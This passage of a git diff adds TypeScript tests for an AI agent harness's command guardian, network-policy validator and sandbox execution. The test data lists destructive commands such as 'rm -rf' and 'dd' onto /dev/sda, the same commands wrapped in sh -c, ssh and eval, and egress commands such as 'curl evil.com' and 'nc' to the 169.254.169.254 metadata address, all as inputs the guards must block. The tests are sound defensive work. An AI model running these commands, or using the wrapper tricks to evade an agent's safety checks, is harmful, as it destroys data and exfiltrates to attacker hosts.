command: `bash -norc -c 'git push origin main'`, + trigger: "git push", + }, + { command: `su -c 'git push origin main'`, trigger: "git push" }, + { + command: `docker run image sh -c 'git push origin main'`, + trigger: "git push", + }, + { + command: `docker run --rm ubuntu sh -c 'git commit -m "msg"'`, + trigger: "git commit", + }, + { command: `bash -c 'rm -rf /tmp/x'`, trigger: "rm -rf" }, + { command: `sh -c'rm -rf /tmp/x'`, trigger: "rm -rf" }, + { command: `sh -c -- 'rm -rf /tmp/x'`, trigger: "rm -rf" }, + { command: `sh -ec 'rm -r /tmp/y'`, trigger: "rm -r" }, + { command: `sh -cx 'git push origin main'`, trigger: "git push" }, + { command: `bash -xce 'git commit -m "msg"'`, trigger: "git commit" }, + { command: `fish -c 'git push origin main'`, trigger: "git push" }, + { command: `su -c 'git push origin main'`, trigger: "git push" }, + { command: `su root -c 'git commit -m "msg"'`, trigger: "git commit" }, + { + command: `ssh deploy@example.com 'git push origin main'`, + trigger: "git push", + }, + { + command: `ssh deploy@example.com'git push origin main'`, + trigger: "git push", + }, + { + command: `ssh -p 2222 host 'git commit -m "msg"'`, + trigger: "git commit", + }, + { command: `ssh host 'rm -rf /tmp/x'`, trigger: "rm -rf" }, + { command: `sh -c 'echo $(git push origin main)'`, trigger: "git push" }, + { command: `eval 'echo $(rm -rf /tmp/x)'`, trigger: "rm -rf" }, + ]; + + for (const { command, trigger } of cases) { + const result = shouldGuardCommand(command); + expect(result.shouldGuard).toBe(true); + expect(result.trigger).toBe(trigger); + } + }); + + it("detects guarded substitutions inside inline shell scripts", () => { + const cases = [ + { + command: `sh -c 'echo $(git push origin main)'`, + trigger: "git push", + }, + { + command: `bash -lc 'echo $(git commit -m "msg")'`, + trigger: "git commit", + }, + { + command: `eval 'echo $(rm -rf /tmp/x)'`, + trigger: "rm -rf", + }, + ]; + + for (const { command, trigger } of cases) { + const result = shouldGuardCommand(command); + expect(result.shouldGuard).toBe(true); + expect(result.trigger).toBe(trigger); + } + }); + + it("detects guarded quoted command args for non-shell launchers", () => { + const cases = [ + { + command: `ssh host 'git push origin main'`, + trigger: "git push", + }, + { + command: `runuser -u deploy -- 'git commit -m "msg"'`, + trigger: "git commit", + }, + { + command: `script -qc 'rm -rf /tmp/x' /dev/null`, + trigger: "rm -rf", + }, + ]; + + for (const { command, trigger } of cases) { + const result = shouldGuardCommand(command); + expect(result.shouldGuard).toBe(true); + expect(result.trigger).toBe(trigger); + } }); it("detects destructive commands", () => { const commands = [ "rm -rf /tmp/x", + "/usr/bin/rm -rf /tmp/x", + "rm -fr /tmp/x", + "rm --recursive --force /tmp/x", "sudo rm -r /tmp/y", + "find . -exec rm -rf {} ;", "find . -delete", "chmod 000 secret", "dd if=/dev/zero of=/dev/sda", @@ -117,14 +301,42 @@ describe("guardian runner", () => { } }); + it("does not merge destructive regexes across command separators", () => { + const commands = ["find; echo -delete", "chmod; 000"]; + + for (const cmd of commands) { + const result = shouldGuardCommand(cmd); + expect(result.shouldGuard).toBe(false); + expect(result.trigger).toBeNull(); + } + }); + it("does not flag rm without recursive flag", () => { - const commands = ["rm -v /home/user/file.txt", "rm -i parent/child"]; + const commands = [ + "rm -v /home/user/file.txt", + "rm -i parent/child", + "rm -- -rf", + "rm -- --recursive --force", + ]; for (const cmd of commands) { const result = shouldGuardCommand(cmd); expect(result.shouldGuard).toBe(false); } }); + it("stops parsing rm options at double dash", () => { + const result = shouldGuardCommand("rm -r -- -f"); + + expect(result.shouldGuard).toBe(true); + expect(result.trigger).toBe("rm -r"); + }); + + it("does not flag literal git commands in single-quoted strings", () => { + const result = shouldGuardCommand("echo '$(git push origin main)'"); + + expect(result.shouldGuard).toBe(false); + }); + it("skips when MAESTRO_GUARDIAN=0 env is set", async () => { process.env.MAESTRO_GUARDIAN = "0"; const result = await runGuardian({ target: "staged", trigger: "test" }); diff --git a/test/packages/core/daytona-sandbox-edge-cases.test.ts b/test/packages/core/daytona-sandbox-edge-cases.test.ts index 4953b1527..3345ea950 100644 --- a/test/packages/core/daytona-sandbox-edge-cases.test.ts +++ b/test/packages/core/daytona-sandbox-edge-cases.test.ts @@ -185,6 +185,25 @@ describe("DaytonaSandbox Edge Cases", () => { }); }); + describe("abortable exec fallbacks", () => { + it("fails when abortable execution is requested without session APIs", async () => { + const handle = createMockHandle(); + const sandbox = await createTestSandbox(handle); + const controller = new AbortController(); + + const result = await sandbox.execWithArgs("gh", ["pr", "view", "1"], { + signal: controller.signal, + }); + + expect(result).toEqual({ + stdout: "", + stderr: "Daytona abortable execution requires session API support", + exitCode: 1, + }); + expect(handle.process.executeCommand).not.toHaveBeenCalled(); + }); + }); + describe("writeFile — edge cases", () => { it("handles empty content", async () => { const handle = createMockHandle(); diff --git a/test/packages/core/daytona-sandbox.test.ts b/test/packages/core/daytona-sandbox.test.ts index 1eda6a93f..9009b820e 100644 --- a/test/packages/core/daytona-sandbox.test.ts +++ b/test/packages/core/daytona-sandbox.test.ts @@ -19,6 +19,18 @@ function createMockHandle() { result: "output\n", exitCode: 0, }), + createSession: vi.fn().mockResolvedValue(undefined), + deleteSession: vi.fn().mockResolvedValue(undefined), + executeSessionCommand: vi.fn().mockResolvedValue({ + cmdId: "cmd-123", + }), + getSessionCommand: vi.fn().mockResolvedValue({ + exitCode: 0, + }), + getSessionCommandLogs: vi.fn().mockResolvedValue({ + stdout: "output\n", + stderr: "", + }), }, fs: { downloadFile: vi.fn().mockResolvedValue(Buffer.from("file contents")), @@ -175,6 +187,224 @@ describe("DaytonaSandbox", () => { expect(result.stderr).toContain("sandbox unreachable"); expect(result.stdout).toBe(""); }); + + it("uses a session so abortable exec can be cancelled", async () => { + const handle = createMockHandle(); + const sandbox = await createTestSandbox(handle); + const controller = new AbortController(); + + const result = await sandbox.exec( + "gh pr view 1", + "/tmp/workdir", + { GH_TOKEN: "secret" }, + controller.signal, + ); + + expect(result).toEqual({ + stdout: "output\n", + stderr: "", + exitCode: 0, + }); + expect(handle.process.executeCommand).not.toHaveBeenCalled(); + expect(handle.process.createSession).toHaveBeenCalledTimes(1); + expect(handle.process.executeSessionCommand).toHaveBeenCalledWith( + expect.any(String), + { + command: "cd '/tmp/workdir' && GH_TOKEN='secret' gh pr view 1", + runAsync: true, + suppressInputEcho: true, + }, + ); + expect(handle.process.deleteSession).toHaveBeenCalledTimes(1); + }); + + it("truncates abortable session output to the bash-sized buffer", async () => { + const handle = createMockHandle(); + handle.process.getSessionCommandLogs.mockResolvedValue({ + stdout: "a".repeat(50 * 1024), + stderr: "b".repeat(50 * 1024), + }); + const sandbox = await createTestSandbox(handle); + const controller = new AbortController(); + + const result = await sandbox.exec( + "gh pr view 1", + undefined, + undefined, + controller.signal, + ); + + expect(result).toEqual({ + stdout: "a".repeat(40 * 1024), + stderr: "b".repeat(40 * 1024), + exitCode: 0, + }); + expect(handle.process.executeCommand).not.toHaveBeenCalled(); + }); + + it("falls back to executeCommand when signals are present but session APIs are unavailable", async () => { + const handle = createMockHandle(); + handle.process.createSession = undefined as never; + handle.process.deleteSession = undefined as never; + handle.process.executeSessionCommand = undefined as never; + handle.process.getSessionCommand = undefined as never; + handle.process.getSessionCommandLogs = undefined as never; + const sandbox = await createTestSandbox(handle); + const controller = new AbortController(); + + const result = await sandbox.exec( + "echo hello", + undefined, + undefined, + controller.signal, + ); + + expect(result).toEqual({ + stdout: "output\n", + stderr: "", + exitCode: 0, + }); + expect(handle.process.executeCommand).toHaveBeenCalledWith("echo hello"); + }); + }); + + describe("execWithArgs", () => { + it("does not start fallback executeCommand when already aborted", async () => { + const handle = createMockHandle(); + handle.process.createSession = undefined as never; + handle.process.deleteSession = undefined as never; + handle.process.executeSessionCommand = undefined as never; + handle.process.getSessionCommand = undefined as never; + handle.process.getSessionCommandLogs = undefined as never; + const controller = new AbortController(); + controller.abort(); + const sandbox = await createTestSandbox(handle); + + const result = await sandbox.execWithArgs("gh", ["pr", "view", "1"], { + signal: controller.signal, + }); + + expect(result.exitCode).toBe(1); + expect(handle.process.executeCommand).not.toHaveBeenCalled(); + }); + + it("fails before fallback executeCommand when abortable sessions are unavailable", async () => { + const handle = createMockHandle(); + handle.process.createSession = undefined as never; + handle.process.deleteSession = undefined as never; + handle.process.executeSessionCommand = undefined as never; + handle.process.getSessionCommand = undefined as never; + handle.process.getSessionCommandLogs = undefined as never; + const controller = new AbortController(); + const sandbox = await createTestSandbox(handle); + + const result = await sandbox.execWithArgs("gh", ["pr", "view", "1"], { + signal: controller.signal, + }); + + expect(result.exitCode).toBe(1); + expect(result.stderr).toContain( + "Daytona abortable execution requires session API support", + ); + expect(handle.process.executeCommand).not.toHaveBeenCalled(); + }); + + it("deletes the remote session when the abort signal fires", async () => { + const handle = createMockHandle(); + const controller = new AbortController(); + handle.process.getSessionCommand.mockImplementation( + () => + new Promise((_, reject) => { + controller.signal.addEventListener( + "abort", + () => reject(new Error("aborted")), + { once: true }, + ); + }), + ); + const sandbox = await createTestSandbox(handle); + + const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"], { + signal: controller.signal, + }); + controller.abort(); + + const result = await promise; + + expect(result.exitCode).toBe(1); + expect(handle.process.executeCommand).not.toHaveBeenCalled(); + expect(handle.process.createSession).toHaveBeenCalledTimes(1); + expect(handle.process.deleteSession).toHaveBeenCalledTimes(1); + }); + + it("retries session deletion when setup-time abort deletes too early", async () => { + const handle = createMockHandle(); + const controller = new AbortController(); + let resolveCreateSession!: () => void; + handle.process.createSession.mockReturnValue( + new Promise((resolve) => { + resolveCreateSession = resolve; + }), + ); + handle.process.deleteSession + .mockRejectedValueOnce(new Error("session not ready")) + .mockResolvedValueOnce(undefined); + const sandbox = await createTestSandbox(handle); + + const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"], { + signal: controller.signal, + }); + await Promise.resolve(); + controller.abort(); + await Promise.resolve(); + resolveCreateSession(); + + const result = await promise; + + expect(result.exitCode).toBe(1); + expect(handle.process.executeSessionCommand).not.toHaveBeenCalled(); + expect(handle.process.deleteSession).toHaveBeenCalledTimes(2); + }); + + it("times out session commands that never complete", async () => { + vi.useFakeTimers(); + try { + const handle = createMockHandle(); + handle.process.getSessionCommand.mockResolvedValue({}); + const sandbox = await createTestSandbox(handle); + const controller = new AbortController(); + + const promise = sandbox.execWithArgs("gh", ["pr", "view", "1"], { + signal: controller.signal, + }); + await vi.advanceTimersByTimeAsync(90_100); + const result = await promise; + + expect(result.exitCode).toBe(1); + expect(result.stderr).toContain("timed out"); + expect(handle.process.deleteSession).toHaveBeenCalledTimes(1); + } finally { + vi.useRealTimers(); + } + }); + + it("returns a cancelled result when abort fires after completion is observed", async () => { + const handle = createMockHandle(); + const controller = new AbortController(); + handle.process.getSessionCommand.mockImplementation(async () => { + controller.abort(); + return { exitCode: 0 }; + }); + const sandbox = await createTestSandbox(handle); + + const result = await sandbox.execWithArgs("gh", ["pr", "view", "1"], { + signal: controller.signal, + }); + + expect(result).toEqual({ stdout: "", stderr: "", exitCode: 1 }); + expect(handle.process.getSessionCommandLogs).not.toHaveBeenCalled(); + expect(handle.process.deleteSession).toHaveBeenCalledTimes(1); + }); }); describe("readFile", () => { diff --git a/test/safety/network-policy-validator.test.ts b/test/safety/network-policy-validator.test.ts index 1b158bc86..964b5edb5 100644 --- a/test/safety/network-policy-validator.test.ts +++ b/test/safety/network-policy-validator.test.ts @@ -1,4 +1,5 @@ import { beforeEach, describe, expect, it, vi } from "vitest"; +import type { ActionApprovalContext } from "../../src/agent/action-approval.js"; const { lookupMock } = vi.hoisted(() => ({ lookupMock: vi.fn(), @@ -8,7 +9,10 @@ vi.mock("node:dns/promises", () => ({ lookup: lookupMock, })); -import { checkNetworkRestrictionsDetailed } from "../../src/safety/validators/network-policy-validator.js"; +import { + checkNetworkPolicy, + checkNetworkRestrictionsDetailed, +} from "../../src/safety/validators/network-policy-validator.js"; describe("network policy validator", () => { beforeEach(() => { @@ -51,6 +55,53 @@ describe("network policy validator", () => { expect(lookupMock).not.toHaveBeenCalled(); }); + it("blocks trailing-dot variants of denylisted hosts", async () => { + const result = await checkNetworkRestrictionsDetailed( + "https://internal.corp./data", + { blockedHosts: ["internal.corp"] }, + ); + const repeatedDotResult = await checkNetworkRestrictionsDetailed( + "https://evil.com../data", + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.host).toBe("internal.corp"); + expect(result.reason).toContain("blocked by enterprise policy"); + expect(repeatedDotResult.allowed).toBe(false); + expect(repeatedDotResult.host).toBe("evil.com"); + expect(repeatedDotResult.reason).toContain("blocked by enterprise policy"); + expect(lookupMock).not.toHaveBeenCalled(); + }); + + it("blocks multiply trailing-dot variants of denylisted hosts", async () => { + const result = await checkNetworkRestrictionsDetailed( + "https://evil.com../data", + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.host).toBe("evil.com"); + expect(result.reason).toContain("blocked by enterprise policy"); + expect(lookupMock).not.toHaveBeenCalled(); + }); + + it("matches trailing-dot URLs against allowlists", async () => { + const result = await checkNetworkRestrictionsDetailed( + "https://api.github.com./repos", + { allowedHosts: ["api.github.com"] }, + ); + + expect(result.allowed).toBe(true); + expect(result.host).toBe("api.github.com"); + const repeatedDotResult = await checkNetworkRestrictionsDetailed( + "https://api.github.com../repos", + { allowedHosts: ["api.github.com"] }, + ); + expect(repeatedDotResult.allowed).toBe(true); + expect(repeatedDotResult.host).toBe("api.github.com"); + }); + it("still resolves allowed hosts when private IP checks are enabled", async () => { lookupMock.mockResolvedValueOnce([{ address: "10.0.0.1", family: 4 }]); @@ -64,4 +115,573 @@ describe("network policy validator", () => { expect(result.resolvedIPs).toEqual(["10.0.0.1"]); expect(lookupMock).toHaveBeenCalledWith("api.github.com", { all: true }); }); + + it("blocks canonicalized IPv6 loopback forms", async () => { + const result = await checkNetworkRestrictionsDetailed( + "http://[0:0:0:0:0:0:0:1]/api", + { blockLocalhost: true }, + ); + + expect(result.allowed).toBe(false); + expect(result.normalizedHost).toBe("::1"); + expect(result.reason).toContain("localhost"); + expect(lookupMock).not.toHaveBeenCalled(); + }); + + it("blocks canonicalized IPv6 private forms", async () => { + const result = await checkNetworkRestrictionsDetailed( + "http://[fc00:0000::1]/api", + { blockPrivateIPs: true }, + ); + + expect(result.allowed).toBe(false); + expect(result.normalizedHost).toBe("fc00::1"); + expect(result.reason).toContain("private IP"); + expect(lookupMock).not.toHaveBeenCalled(); + }); + + it("applies network policy to netcat host targets", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "nc 169.254.169.254 80" }, + } as ActionApprovalContext, + { blockPrivateIPs: true }, + ); + + expect(result.allowed).toBe(false); + expect(result.reason).toContain("private IP"); + }); + + it("applies network policy through shell command wrappers", async () => { + const sudoResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "sudo curl evil.com" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + const envResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "env FOO=bar nc 169.254.169.254 80" }, + } as ActionApprovalContext, + { blockPrivateIPs: true }, + ); + + expect(sudoResult.allowed).toBe(false); + expect(sudoResult.reason).toContain("blocked by enterprise policy"); + expect(envResult.allowed).toBe(false); + expect(envResult.reason).toContain("private IP"); + }); + + it("applies network policy through xargs-prefixed network commands", async () => { + const blockedResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "xargs curl evil.com" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + const opaqueResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "xargs curl $TARGET" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(blockedResult.allowed).toBe(false); + expect(blockedResult.reason).toContain("blocked by enterprise policy"); + expect(opaqueResult.allowed).toBe(false); + expect(opaqueResult.reason).toContain("does not expose"); + }); + + it("applies network policy through bash -c wrappers", async () => { + const blockedResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: 'bash -c "curl evil.com"' }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + const opaqueResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: 'bash -c "git fetch origin"' }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(blockedResult.allowed).toBe(false); + expect(blockedResult.reason).toContain("blocked by enterprise policy"); + expect(opaqueResult.allowed).toBe(false); + expect(opaqueResult.reason).toContain("does not expose"); + const privateIpResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "sh -c 'nc 169.254.169.254 80'" }, + } as ActionApprovalContext, + { blockPrivateIPs: true }, + ); + + expect(privateIpResult.allowed).toBe(false); + expect(privateIpResult.reason).toContain("private IP"); + const longOptionResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "bash --command 'curl evil.com'" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + const gluedShortOptionResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "bash -c'curl evil.com'" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + const dashResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "dash -c 'git fetch origin'" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + const execResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "exec bash -c 'curl evil.com'" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(longOptionResult.allowed).toBe(false); + expect(longOptionResult.reason).toContain("blocked by enterprise policy"); + expect(gluedShortOptionResult.allowed).toBe(false); + expect(gluedShortOptionResult.reason).toContain( + "blocked by enterprise policy", + ); + expect(dashResult.allowed).toBe(false); + expect(dashResult.reason).toContain("does not expose"); + expect(execResult.allowed).toBe(false); + expect(execResult.reason).toContain("blocked by enterprise policy"); + }); + + it("applies network policy to command substitutions", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "echo $(curl evil.com)" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.reason).toContain("blocked by enterprise policy"); + }); + + it("applies network policy to find exec network commands", async () => { + const blockedResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "find . -exec curl evil.com \\;" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + const opaqueResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "find . -exec curl $TARGET \\;" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(blockedResult.allowed).toBe(false); + expect(blockedResult.reason).toContain("blocked by enterprise policy"); + expect(opaqueResult.allowed).toBe(false); + expect(opaqueResult.reason).toContain("does not expose"); + }); + + it("applies network policy to git remotes", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git clone https://evil.com/repo.git" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.reason).toContain("blocked by enterprise policy"); + }); + + it("applies network policy to git wrapper subcommands", async () => { + const opaqueResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git lfs fetch origin" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + const blockedResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git svn clone https://evil.com/repo.git" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(opaqueResult.allowed).toBe(false); + expect(opaqueResult.reason).toContain("does not expose"); + expect(blockedResult.allowed).toBe(false); + expect(blockedResult.reason).toContain("blocked by enterprise policy"); + }); + + it("applies network policy to git archive --remote targets", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { + command: "git archive --remote=git@evil.com:org/repo.git HEAD", + }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.reason).toContain("blocked by enterprise policy"); + }); + + it("applies network policy to git remote add URLs", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { + command: "git remote add origin https://github.com/evalops/repo.git", + }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("does not treat local git remote commands as network egress", async () => { + const verboseResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git remote -v" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + const removeResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git remote remove origin" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(verboseResult.allowed).toBe(true); + expect(removeResult.allowed).toBe(true); + }); + + it("applies network policy to git submodule add URLs", async () => { + const allowedResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { + command: + "git submodule add -b main https://github.com/evalops/repo.git vendor/repo", + }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + const blockedResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { + command: "git submodule add https://evil.com/repo.git vendor/repo", + }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(allowedResult.allowed).toBe(true); + expect(blockedResult.allowed).toBe(false); + expect(blockedResult.reason).toContain("blocked by enterprise policy"); + }); + + it("does not treat local git submodule bookkeeping commands as network egress", async () => { + const initResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git submodule init" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + const syncResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git submodule sync" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(initResult.allowed).toBe(true); + expect(syncResult.allowed).toBe(true); + }); + + it("allows git clone remotes after clone option values", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { + command: + "git clone -b main --depth 1 https://github.com/evalops/repo.git repo", + }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("applies network policy to localhost curl targets", async () => { + lookupMock.mockResolvedValueOnce([{ address: "127.0.0.1", family: 4 }]); + + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "curl localhost:3000/api" }, + } as ActionApprovalContext, + { blockPrivateIPs: true }, + ); + + expect(result.allowed).toBe(true); + expect(lookupMock).toHaveBeenCalledWith("localhost", { all: true }); + }); + + it("fails closed on network commands without a static host", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git fetch origin" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.reason).toContain("does not expose"); + }); + + it("applies network policy inside command substitutions", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "echo $(curl evil.com)" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.reason).toContain("blocked by enterprise policy"); + }); + + it("applies network policy inside shell option wrappers before -c", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "bash -o pipefail -c 'curl evil.com'" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.reason).toContain("blocked by enterprise policy"); + }); + + it("applies network policy inside process substitutions", async () => { + const blockedResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "cat <(curl evil.com)" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + const opaqueResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "cat <(curl $TARGET)" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(blockedResult.allowed).toBe(false); + expect(blockedResult.reason).toContain("blocked by enterprise policy"); + expect(opaqueResult.allowed).toBe(false); + expect(opaqueResult.reason).toContain("does not expose"); + }); + + it("does not treat command -v lookups as network egress", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "command -v curl" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("ignores URL literals in non-network shell commands", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "echo https://evil.com" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("does not let a decoy URL hide an opaque network target", async () => { + const gitResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git fetch origin https://github.com" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + const netcatResult = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "nc $TARGET https://github.com" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(gitResult.allowed).toBe(false); + expect(gitResult.reason).toContain("does not expose"); + expect(netcatResult.allowed).toBe(false); + expect(netcatResult.reason).toContain("does not expose"); + }); + + it("allows validated URL-bearing flag values", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { + command: + "git archive --remote=https://github.com/evalops/maestro.git HEAD", + }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("allows downloader commands with validated URLs and static output paths", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "curl https://github.com/evalops/repo ./repo.html" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("fails closed when downloader commands include dynamic targets", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "curl https://github.com/evalops/repo $TARGET" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.reason).toContain("does not expose"); + }); + + it("allows local git archive commands without remote targets", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git archive --format=tar HEAD" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("applies network policy to scp-style git archive remotes", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { + command: "git archive --remote=git@evil.com:org/repo.git HEAD", + }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(false); + expect(result.reason).toContain("blocked by enterprise policy"); + }); + + it("ignores inert URLs in non-network shell commands", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "echo https://evil.com" }, + } as ActionApprovalContext, + { blockedHosts: ["evil.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("allows SSH user@host targets when the host is allowlisted", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "ssh user@github.com" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("allows local git clone targets under network policy", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git clone ./repo" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(true); + }); + + it("allows local git archive commands under network policy", async () => { + const result = await checkNetworkPolicy( + { + toolName: "bash", + args: { command: "git archive --format=tar HEAD" }, + } as ActionApprovalContext, + { allowedHosts: ["github.com"] }, + ); + + expect(result.allowed).toBe(true); + }); }); diff --git a/test/sandbox-integration.test.ts b/test/sandbox-integration.test.ts index 1e37cd52b..b27ef33d8 100644 --- a/test/sandbox-integration.test.ts +++ b/test/sandbox-integration.test.ts @@ -33,6 +33,24 @@ describe("Sandbox", () => { expect(result.exitCode).toBe(1); }); + it("should cap execWithArgs output instead of failing on large output", async () => { + const testDir = join(tmpdir(), `sandbox-test-${Date.now()}`); + mkdirSync(testDir, { recursive: true }); + const scriptPath = join(testDir, "large-output.js"); + writeFileSync( + scriptPath, + `process.stdout.write("x".repeat(${1024 * 1024 + 1024}));`, + ); + + try { + const result = await sandbox.execWithArgs("node", [scriptPath]); + expect(result.exitCode).toBe(0); + expect(result.stdout.length).toBe(1024 * 1024); + } finally { + rmSync(testDir, { recursive: true, force: true }); + } + }); + it("should read files", async () => { const testDir = join(tmpdir(), `sandbox-test-${Date.now()}`); mkdirSync(testDir, { recursive: true }); diff --git a/test/sandbox/docker-sandbox.test.ts b/test/sandbox/docker-sandbox.test.ts new file mode 100644 index 000000000..486e23e68 --- /dev/null +++ b/test/sandbox/docker-sandbox.test.ts @@ -0,0 +1,150 @@ +import { EventEmitter } from "node:events"; +import { beforeEach, describe, expect, it, vi } from "vitest"; + +const childProcessMock = vi.hoisted(() => ({ + exec: vi.fn(), + spawn: vi.fn(), +})); + +vi.mock("node:child_process", () => childProcessMock); + +import { DockerSandbox } from "../../src/sandbox/docker-sandbox.js"; + +type MockChildProcess = EventEmitter & { + stdout: EventEmitter; + stderr: EventEmitter; +}; + +function createMockChildProcess(): MockChildProcess { + const child = new EventEmitter() as MockChildProcess; + child.stdout = new EventEmitter(); + child.stderr = new EventEmitter(); + return child; +} + +describe("DockerSandbox", () => { + beforeEach(() => { + childProcessMock.exec.mockReset(); + childProcessMock.spawn.mockReset(); + }); + + it("caps execWithArgs output to the default buffer size", async () => { + const sandbox = new DockerSandbox(); + (sandbox as unknown as { containerId: string | null }).containerId = + "container-id"; + const child = createMockChildProcess(); + childProcessMock.spawn.mockReturnValueOnce(child); + + const promise = sandbox.execWithArgs("gh", ["api"]); + await Promise.resolve(); + child.stdout.emit("data", Buffer.from("x".repeat(1024 * 1024 + 1024))); + child.emit("close", 0); + + const result = await promise; + + expect(childProcessMock.spawn).toHaveBeenCalledWith( + "docker", + ["exec", "container-id", "gh", "api"], + { + signal: undefined, + stdio: ["ignore", "pipe", "pipe"], + }, + ); + 